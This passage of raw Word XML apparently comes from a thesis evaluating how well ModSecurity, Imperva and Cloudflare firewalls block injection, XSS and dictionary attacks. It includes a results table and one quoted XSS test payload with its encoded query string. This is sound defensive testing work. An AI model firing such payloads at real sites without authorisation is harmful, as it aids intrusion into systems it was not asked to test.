      <w:tr w:rsidR="00213189" w:rsidRPr="00213189" w14:paraId="61D3AB43" w14:textId="77777777" w:rsidTr="00695FFA">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>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828EC42" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>HTML injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04FC99D0" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>116/116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69A58160" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>1/116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D611E4A" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>1/116</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00213189" w:rsidRPr="00213189" w14:paraId="6338049D" w14:textId="77777777" w:rsidTr="00695FFA">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>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05E13E4" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>OS command injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="042DD08C" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>4/143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CA63F9B" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>1/143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40E318B7" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>1/143</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00213189" w:rsidRPr="00213189" w14:paraId="3486FCF4" w14:textId="77777777" w:rsidTr="00695FFA">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>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715D698" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>PHP code injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BD68413" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>36/154</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F959450" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>5/154</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78677882" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>6/154</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00213189" w:rsidRPr="00213189" w14:paraId="3CEC2805" w14:textId="77777777" w:rsidTr="00695FFA">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>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908628E" w14:textId="21A493FE" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">Broken authentication </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31B9D2A8" w14:textId="09AAC5BF" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00A61DBA" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE6606">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40D3452F" w14:textId="508D860B" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00A61DBA" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE6606">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0411E0DD" w14:textId="4D87C332" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00A61DBA" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE6606">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C1FC095" w14:textId="6D6587DF" w:rsidR="00213189" w:rsidRPr="00DE6606" w:rsidRDefault="00695FFA" w:rsidP="00695FFA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc71138546"/>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Security test results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="5464DADA" w14:textId="22B3938F" w:rsidR="00695FFA" w:rsidRDefault="00695FFA" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The results were gathered and compiled into Table </w:t>
      </w:r>
      <w:r w:rsidR="006A6BB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, which shows the number of payload values that were blocked against the total number of payload values (blocked/total) used for that particular attack method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6D4996" w14:textId="0ECAF4C0" w:rsidR="0034134C" w:rsidRPr="00DE6606" w:rsidRDefault="0034134C" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="006A6BB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> depicted the results of how well each of the three WAFs was able to block each of seven attack methods – SQL injection, HTML injection, OS command injection, PHP code injection, </w:t>
      </w:r>
      <w:r w:rsidR="00212B28" w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00616BB1" w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Broken authentication (through dictionary attack) </w:t>
      </w:r>
      <w:r w:rsidR="00616BB1" w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>by injecting payloads in the requests through to the WAFs</w:t>
      </w:r>
      <w:r w:rsidR="00DD054C" w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF7BCB1" w14:textId="122CB188" w:rsidR="00212B28" w:rsidRPr="00DE6606" w:rsidRDefault="00212B28" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>From the results, ModSecurity was able to block the most attack attempts in six out of seven methods, while drawing the same result for blocking XSS as Imperva’s cloud WAF.</w:t>
      </w:r>
      <w:r w:rsidR="0011614C" w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Imperva fared second best and Cloudflare last.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8E63A7" w14:textId="5298A307" w:rsidR="000848A9" w:rsidRPr="00DE6606" w:rsidRDefault="00FE6389" w:rsidP="00FE6389">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc71138503"/>
      <w:r>
        <w:t xml:space="preserve">4.4.1 </w:t>
      </w:r>
      <w:r w:rsidR="000848A9" w:rsidRPr="00DE6606">
        <w:t>Cross Site Scripting</w:t>
      </w:r>
      <w:r w:rsidR="005C2EF4">
        <w:t xml:space="preserve"> (XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="4331087D" w14:textId="4888E64B" w:rsidR="000848A9" w:rsidRDefault="00E15258" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ModSecurity was observed to block all of the XSS payloads while Imperva blocked all but one payload and Cloudflare blocked 108 of the 124 payloads, allowing through 16 of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7716FB" w14:textId="7A4FE3E0" w:rsidR="00034E7B" w:rsidRDefault="00E15258" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">One of the payloads that was blocked by all three WAFs was </w:t>
      </w:r>
      <w:r w:rsidRPr="00E15258">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>';alert(1);'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1F6103" w14:textId="1EE7D6AA" w:rsidR="007B7BE0" w:rsidRPr="000848A9" w:rsidRDefault="00E15258" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloudflare identified the request as an XSS attempt and blocked it with the rule ID 101174, “XSS – JS Context Escape”. The query string that triggered the rule was </w:t>
      </w:r>
      <w:r w:rsidRPr="00E15258">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>?firstname=%27%3Balert%281%29%3B%27&amp;lastname=&amp;form=submit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00116BB6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5A2C5F" w14:textId="34DB176A" w:rsidR="00DA0EB3" w:rsidRPr="00DE6606" w:rsidRDefault="0034265E" w:rsidP="0034265E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc71138504"/>
      <w:r>
        <w:t xml:space="preserve">4.4.2 </w:t>
      </w:r>
      <w:r w:rsidR="00DA0EB3" w:rsidRPr="00DE6606">
        <w:t>SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="6B301180" w14:textId="4AEFC51E" w:rsidR="008733A7" w:rsidRDefault="005F7AC0" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
